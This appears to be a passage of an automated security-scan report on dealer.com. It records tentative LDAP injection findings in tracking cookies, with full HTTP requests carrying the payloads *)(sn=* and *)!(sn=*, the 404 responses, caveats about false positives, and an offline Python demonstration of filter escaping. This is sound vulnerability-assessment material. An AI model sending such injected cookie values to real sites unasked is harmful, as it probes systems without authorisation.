Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20284
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:29:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003739; expires=Mon, 16-Apr-2012 01:28:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spo
...[SNIP]...

1.6. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. The two requests produced different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20356
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003737; expires=Mon, 16-Apr-2012 01:28:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/u
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)!(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20027
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="
...[SNIP]...

1.7. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMAWebCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMAWebCookie cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMAWebCookie cookie. If the value were spliced unescaped into a conjunctive (&...) LDAP filter, the first payload would close the current item and append a well-formed (sn=*) term, while the second would leave a bare ! where only a parenthesised filter may appear, which is invalid filter syntax. The two requests produced different responses, which the scanner treats as a sign that the input may be incorporated into a conjunctive LDAP query unsafely.

Caveat: both responses are the site's 404 page for a loading.gif path that does not exist, and the visible differences (Content-Length 20042 against 20134, the Date and Set-Cookie headers, and which testimonials and ad spotlights are shown) are of the same kind as those between every other response pair quoted in this report. The difference cannot be tied to the payload without further testing, which is what the Tentative confidence reflects.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20042
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003558; expires=Mon, 16-Apr-2012 01:25:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real hum
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20134
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003559; expires=Mon, 16-Apr-2012 01:25:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight
...[SNIP]...

1.8. http://www.dealer.com/products/online-advertising/powermail/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/powermail/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads d62447ad87cf5458)(sn=* and d62447ad87cf5458)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. This is the disjunctive (|...) variant of the check: a random token takes the place of the original value, the first payload then appends a well-formed (sn=*) term, and the second inserts a bare !, which is invalid filter syntax. The two requests produced different responses, which the scanner treats as a sign that the input may be incorporated into a disjunctive LDAP query unsafely.

Caveat: both responses are 404 pages for a loading.gif path that does not exist, and they differ in Content-Length (20162 against 20238), Date, Set-Cookie and the rotating testimonial and ad blocks, none of which can be tied to the payload. The Tentative confidence should be read accordingly.
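The differential check behind this issue and issue 1.7 can be reproduced offline. The block below is an added example, not code from the XSS.CX report or from the scanner that produced it. It assumes a hypothetical application that concatenates a cookie value unescaped into an LDAP search filter (the filter templates and the attribute names uid, mail and objectClass are assumptions), checks each resulting filter against a simplified RFC 4515 grammar, and shows that the first payload of each pair stays well-formed while the second does not, which is the asymmetry a server that really parses the value would expose as a response difference. The same values are also run through RFC 4515 escaping to show that the fix removes the asymmetry. Nothing here contacts dealer.com or a directory server.

```python
"""Differential LDAP-injection probe, modelled on the payload pairs used in
issues 1.7 (conjunctive) and 1.8 (disjunctive) of this report.

Added example, not part of the XSS.CX report or of the scanner that produced
it. The filter templates are a hypothetical vulnerable application; nothing
here contacts dealer.com or an LDAP server.
"""
import re

# Hypothetical vulnerable filter builders: the cookie value is concatenated
# into the filter with no escaping (the bug the scanner is probing for).
def conjunctive_filter(cookie_value: str) -> str:
    return "(&(uid=" + cookie_value + ")(objectClass=person))"


def disjunctive_filter(cookie_value: str) -> str:
    return "(|(uid=" + cookie_value + ")(mail=" + cookie_value + "))"


# RFC 4515 escaping: the only characters that can change the structure of a
# filter are replaced by their \xx hex forms.
_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def escape_filter_value(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def safe_conjunctive_filter(cookie_value: str) -> str:
    return "(&(uid=" + escape_filter_value(cookie_value) + ")(objectClass=person))"


def safe_disjunctive_filter(cookie_value: str) -> str:
    v = escape_filter_value(cookie_value)
    return "(|(uid=" + v + ")(mail=" + v + "))"


# Simplified RFC 4515 grammar:
#   filter = "(" ( "&" 1*filter | "|" 1*filter | "!" filter | item ) ")"
#   item   = attr ( "=" | "~=" | ">=" | "<=" ) value-without-parentheses
_ITEM = re.compile(r"[A-Za-z][A-Za-z0-9.;-]*(~=|>=|<=|=)[^()]*")


def _parse_filter(s: str, i: int):
    """Parse one parenthesised filter starting at s[i]; return (next_index, ok)."""
    if i >= len(s) or s[i] != "(":
        return i, False
    i += 1
    if i >= len(s):
        return i, False
    if s[i] in "&|":                      # and / or: one or more sub-filters
        i += 1
        count = 0
        while i < len(s) and s[i] == "(":
            i, ok = _parse_filter(s, i)
            if not ok:
                return i, False
            count += 1
        if count == 0:
            return i, False
    elif s[i] == "!":                     # not: exactly one sub-filter
        i, ok = _parse_filter(s, i + 1)
        if not ok:
            return i, False
    else:                                 # simple item such as (sn=*)
        m = _ITEM.match(s, i)
        if not m:
            return i, False
        i = m.end()
    if i >= len(s) or s[i] != ")":
        return i, False
    return i + 1, True


def is_valid_filter(f: str) -> bool:
    end, ok = _parse_filter(f, 0)
    return ok and end == len(f)


def probe(build_filter, payload_pair):
    """Return (valid?, valid?) for the two payloads of a scanner-style pair.

    (True, False) is the pattern the scanner looks for: the first payload keeps
    the filter well-formed, the second breaks it, so a server that really parses
    the value would answer the two requests differently.
    """
    return tuple(is_valid_filter(build_filter(p)) for p in payload_pair)


CONJUNCTIVE_PAIR = ("*)(sn=*", "*)!(sn=*")                                 # issue 1.7
DISJUNCTIVE_PAIR = ("d62447ad87cf5458)(sn=*", "d62447ad87cf5458)!(sn=*")  # issue 1.8

if __name__ == "__main__":
    for name, build, pair in (
        ("conjunctive, unescaped", conjunctive_filter, CONJUNCTIVE_PAIR),
        ("conjunctive, escaped", safe_conjunctive_filter, CONJUNCTIVE_PAIR),
        ("disjunctive, unescaped", disjunctive_filter, DISJUNCTIVE_PAIR),
        ("disjunctive, escaped", safe_disjunctive_filter, DISJUNCTIVE_PAIR),
    ):
        print(f"{name:24s} {probe(build, pair)}")
        for p in pair:
            print("    ", build(p))
```

The unescaped builders yield (True, False) for both pairs; the escaped builders yield (True, True), because after escaping the cookie value can no longer open or close a filter item. A real verification would send each payload several times and compare the responses only after removing content that changes on every request; the example models the filter side only.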

Request 1

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
